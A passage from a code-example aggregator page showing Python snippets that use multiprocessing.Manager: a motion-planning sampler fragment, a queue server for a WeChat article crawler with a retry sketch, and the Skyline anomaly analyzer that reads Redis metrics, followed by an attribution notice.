            self.mDistSamples.append( randFreeSamp );
            bounds = randFreeSamp.getBoundaryConfigs( maxDimLens );

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:			# put the boundconfig-sphere relation to the dictionary
                bndSphDict[str(bndConfig)] = randFreeSamp;
                boundaryQueue.append( bndConfig );				# put the boundary config to the queue.

            while( len( boundaryQueue) != 0 ):
#......... part of the code is omitted here .........
Author: IanZhang1990, Project: Robotics-MotionPlanning, Lines: 103, Source: SampleManager2.py

Example 14: Queue_server

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class Queue_server(object):
    
    '''
    Initialize the queue of WeChat official accounts
    @param Tuple wx_lists: list of official accounts
    '''
    def __init__(self ,wx_lists=()):
        self.__queue = Manager().Queue(-1)
        self.init_wx_lists(wx_lists)
        self.__fail_list = Manager().list()
    '''
    Initialize the queue of WeChat official accounts
    @param Tuple wx_lists: list of official accounts
    '''
    def init_wx_lists(self ,wx_lists=()):
        for wx in wx_lists:
            self.put(wx)
    '''
    Add an element
    @param mixed value: the element to add
    '''
    def put(self ,value):
        self.__queue.put(value)
    
    '''
    Pop an element
    @return mixed
    '''
    def get(self):
        if not self.empty():
            return self.__queue.get()
        return False
    
    '''
    Get the underlying queue
    @return mixed
    '''
    def get_wx_lists_queue(self):
        return self.__queue
    
    '''
    Get the queue size
    @return int
    '''
    def get_size(self):
        return self.__queue.qsize()
    
    '''
    Whether the queue is empty
    @return bool
    '''
    def empty(self):
        return self.__queue.empty()
    
    '''
    Record a failed item
    @param tuple wx_data: official-account info
    @return bool
    '''
    def put_fail_wx(self , wx_data):
        self.__fail_list.append(wx_data)
    
    '''
    Print the failure list
    '''
    def print_fail_list(self ,flush=None):
        if len(self.__fail_list) > 0 :
            for fail in self.__fail_list:
                self.put(fail)
                print 'the fail wx : {0}' . format(fail)
            if not flush:
                self.__fail_list = Manager().list()
        elif flush:
            print 'all success'
            
    # Check whether anything failed
    def is_have_failed(self):
        # Check whether any failed accounts have been re-added to the queue
        return not self.empty()
Author: yankaics, Project: get_wx_article, Lines: 81, Source: queue_server.py
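A simplified sketch of the retry pattern behind Example 14: workers append failed items to a shared Manager list, and the parent pushes them back onto the shared queue for another round. The worker() function and the "odd items fail" rule are made up for illustration.

from multiprocessing import Manager, Process

def worker(queue, fail_list):
    while not queue.empty():
        item = queue.get()
        if item % 2:              # pretend that odd items fail
            fail_list.append(item)

if __name__ == '__main__':
    manager = Manager()
    queue = manager.Queue(-1)
    fail_list = manager.list()
    for i in range(6):
        queue.put(i)
    p = Process(target=worker, args=(queue, fail_list))
    p.start()
    p.join()
    for item in fail_list:        # re-queue everything that failed
        queue.put(item)
    print(list(fail_list), queue.qsize())  # [1, 3, 5] 3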

Example 15: Analyzer

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    metric = [datapoint, metric_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
                    self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
#......... part of the code is omitted here .........
Author: HeTyHuka, Project: skyline, Lines: 103, Source: analyzer.py


Note: The multiprocessing.Manager.append examples in this article were compiled by 纯净天空 from open-source code and documentation platforms such as GitHub and MSDocs. The code snippets were selected from open-source projects contributed by various developers; copyright of the source code belongs to the original authors, and distribution and use should follow the corresponding project's license. Do not reproduce without permission.